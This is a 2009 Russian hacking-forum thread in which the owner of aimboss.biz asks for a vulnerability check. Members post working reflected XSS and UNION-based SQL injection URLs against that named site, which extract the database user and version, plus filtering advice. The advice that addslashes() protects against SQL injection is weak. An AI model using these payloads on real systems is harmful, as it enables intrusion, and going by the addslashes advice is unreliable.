Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   aimboss.biz (https://forum.antichat.xyz/showthread.php?t=126408)

DECIDE 22.06.2009 10:49
aimboss.biz
 
Пожалуйста проверьте мой сайт на уязвимости
если необходимо начислю кредитов и опишу возможности которых очень много и нужно всё отладить
Заранее спасибо!

BlackSun 22.06.2009 11:17
Пассивная XSS
http://aimboss.biz/?nvg=/user:<script>alert()</script>
http://aimboss.biz/?nvg=s-jsip:pinfo:</title></head><body><img src=.+onerror=alert()><!--
http://aimboss.biz/?nvg=t:message:"><script>alert()</script><!--

SQL-INJ
http://aimboss.biz/?nvg=/user::-1+union+select+concat_ws(0x3a,user(),version()),2, 3+--+
http://aimboss.biz/?nvg=weblog:pages:1,1,4,-1'+OR+1=1+--+
http://aimboss.biz/?nvg=s-jsip:pinfo:-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), version()),8+--+

wildshaman 22.06.2009 11:20
Пассивка:
http://aimboss.biz/?nvg=casino:rally:run"><script>alert()</script>

по-моему, она там везде :)

DECIDE 22.06.2009 11:55
спасибо, буду исправлять
ЗЫ. а как сделали столько много.. в онлайне?

BlackSun: хз, побочные эффекты

это понятно что это только цветочки.., главное что указали на то как не стоит делать, и что надо фильтровать Get запросы

BlackSun: фильровать надо всё, _GET, _POST, _COOKIE, _FILES, и тп. Все данные от пользователей.

BlackSun 22.06.2009 12:21
Продолжу в этом посте ..

SQL-INJ, http://aimboss.biz/?nvg=!site:z:usr
В поле ник:
Цитата:
%' union select 1,concat_ws(0x3a,user(),version()),3,4 -- -
Вывод в последней записи

http://aimboss.biz/?nvg=t:vfile:-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion())+--+

nemaniak 22.06.2009 12:26
Вот еще парочка...
http://aimboss.biz/?nvg=weblog:myblogs:-211+union+select+1,2,3,4,concat_ws(char(58),user() ,database(),version()),6,7,8,9,10,11,12,13,14--

http://aimboss.biz/?nvg=weblog:<script>alert()</script>

вообщем все баги идентичны

BlackSun 22.06.2009 12:36
Короче, думаю дальше уже нет смысла копать, идите на полную доработку, фильтрации нет вообще нигде. Потом уже действительно на проверку.

DECIDE 22.06.2009 12:43
как лучше производить фильтрацию?
от JS
strip_tags()
а от SQL-INJ
как можно обезопасится?

сегодня-завтра постараюсь всё исправить и надеюсь на дельнейшую помошь в поиске уязвимостей

ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне..

BlackSun 22.06.2009 12:50
addslashes(), inval(), маны по пыху в помошь. Есстественно, если в параметре может быть только число, то лучше использовать intval(), а не addslashes.

Цитата:
ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне..
Оно как то само))

DECIDE 22.06.2009 14:21
что даст addslashes()?
думаю бесполезная функция в данном случае


Время: 12:56
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице